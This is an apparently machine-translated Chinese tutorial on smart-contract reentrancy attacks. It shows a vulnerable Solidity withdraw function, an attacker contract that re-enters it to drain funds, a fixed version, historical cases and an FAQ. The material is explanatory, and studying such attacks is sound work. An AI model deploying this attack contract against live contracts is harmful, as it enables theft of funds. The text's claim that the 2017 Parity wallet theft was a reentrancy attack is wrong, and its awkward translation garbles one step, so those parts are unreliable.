如何重新进入区块链？

重新进入攻击在交易完成之前反复调用功能来利用智能合同漏洞，如果无法正确固定，则冒着基金排水的风险。

2025/04/11 20:21

攻击简介

重新进入攻击是一种可能发生在区块链智能合约（尤其是处理金融交易的）上的利用。这种类型的攻击利用合同代码中的漏洞，使攻击者在完成初始交易之前可以重复调用功能。了解这些攻击的发生方式对于开发人员和用户保护其资产并保持区块链的完整性至关重要。

重新进入攻击的机制

重新进入攻击通常针对涉及资金转移的智能合约。攻击利用合同逻辑中的缺陷，在此之前，合同在更新其内部状态之前将资金发送到外部地址。这是其工作原理：

• 初始呼叫：攻击者启动了一项交易，该交易调用脆弱的智能合约中的功能，该交易旨在将资金发送到攻击者的地址。
• 外部呼叫：合同更新其内部状态（例如，降低发件人的余额），它将资金发送到攻击者的地址。
• 重新进入：攻击者的地址是在收到资金后再次自动调用相同功能的，从而在完全处理初始交易之前重新进入合同。
• 循环：此过程可以重复多次，使攻击者能够耗尽合同的资金，直到合同的逻辑最终更新其状态或耗尽了资金。

脆弱的智能合同代码

要了解如何执行重新进入攻击，让我们看一下以坚固性书写的脆弱智能合约的简化示例，该智能合约是用于以太坊智能合约的编程语言：

 contract VulnerableContract { mapping(address => uint) public balances; function withdraw(uint amount) public { require(balances[msg.sender] >= amount, 'Insufficient balance'); // Send funds to the caller (bool success, ) = msg.sender.call{value: amount}(''); require(success, 'Transfer failed'); // Update the balance balances[msg.sender] -= amount; } function deposit() public payable { balances[msg.sender] += msg.value; }

}

在此示例中， withdraw功能首先将资金发送给呼叫者，然后更新余额。此序列使攻击者可以在更新余额之前重新获得合同。

执行重新进入攻击

要执行重新进入攻击，攻击者将需要设置一个恶意合同，该合同可以在收到资金时自动调用withdraw功能。这是这种恶意合同的简化示例：

 contract AttackContract { VulnerableContract public vulnerableContract; constructor(address _vulnerableContractAddress) { vulnerableContract = VulnerableContract(_vulnerableContractAddress); } function attack() public { vulnerableContract.withdraw(vulnerableContract.balances(address(this))); } receive() external payable { if (address(vulnerableContract).balance >= msg.value) { vulnerableContract.withdraw(msg.value); } }

}

• 部署攻击合同：攻击者部署了AttackContract并用VulnerableContract的地址将其初始化。
• 启动攻击：攻击者调用AttackContract上的attack函数，然后将其称为VulnerableContract上的withdraw功能。
• 重新进入循环：收到资金后， AttackContract中的receive功能会自动呼叫withdraw ，从而创建一个循环，以排除VulnerableContract合同。

防止重新进入攻击

为了防止重新进入攻击，开发人员必须确保在进行任何外部呼叫之前对合同的内部状态进行更新。这是对重新进入攻击具有抵抗力的VulnerableContract的更新版本：

 contract SecureContract { mapping(address => uint) public balances; function withdraw(uint amount) public { require(balances[msg.sender] >= amount, 'Insufficient balance'); // Update the balance first balances[msg.sender] -= amount; // Then send funds to the caller (bool success, ) = msg.sender.call{value: amount}(''); require(success, 'Transfer failed'); } function deposit() public payable { balances[msg.sender] += msg.value; }

}

在此安全版本中，在发送资金之前会更新余额，以防止任何重新进入。

重新进入攻击的现实示例

重新进入攻击的最臭名昭著的例子之一是2016年以太坊区块链上的DAO黑客攻击。DAO（分散的自治组织）是一项旨在作为风险投资资本基金运作的智能合约，但它包含了类似于上述的脆弱性。一名攻击者利用了这种脆弱性，从DAO中排出大约360万ETH，从而导致以太坊区块链的坚硬分叉扭转了攻击。

另一个例子是2017年的奇特钱包骇客，攻击者在奇偶校验多签名钱包中利用了重新进入脆弱性，导致盗窃超过150,000 ETH。

常见问题

问：是否可以在区块链上实时检测重新进入攻击？
答：由于区块链的分散性质，实时检测重新进入攻击可能是具有挑战性的。但是，一些区块链平台和安全公司使用高级监视工具和异常检测算法来识别可能表示重新进入攻击的可疑模式。这些工具可以在发生重大损害之前提醒用户和开发人员潜在的漏洞。

问：所有智能合约是否容易进入重新进入攻击？
答：不，并非所有智能合约都容易受到重新进入攻击的攻击。不涉及资金或不进行外部呼叫的合同通常不容易受到影响。但是，在更新其内部状态之前将资金寄给外部地址的任何合同都可能处于危险之中。

问：用户可以采取哪些步骤来保护自己免受再入攻击？
答：用户可以通过谨慎与智能合约互动，尤其是那些处理大量金钱的合同来保护自己。他们应该研究合同的守则和审计报告，使用信誉良好的平台，并将其资金保留在安全的钱包中。此外，了解智能合同安全性的常见漏洞和最佳实践可以帮助用户做出更安全的决定。

问：开发人员如何确保他们的智能合约可以防止重新进入攻击？
答：开发人员可以通过遵循最佳实践（例如“检查效应相互作用”模式，在进行任何外部呼叫之前更新合同的内部状态。他们还应进行彻底的代码审核，使用正式的验证工具，并在区块链领域的最新安全指南和漏洞中保持最新信息。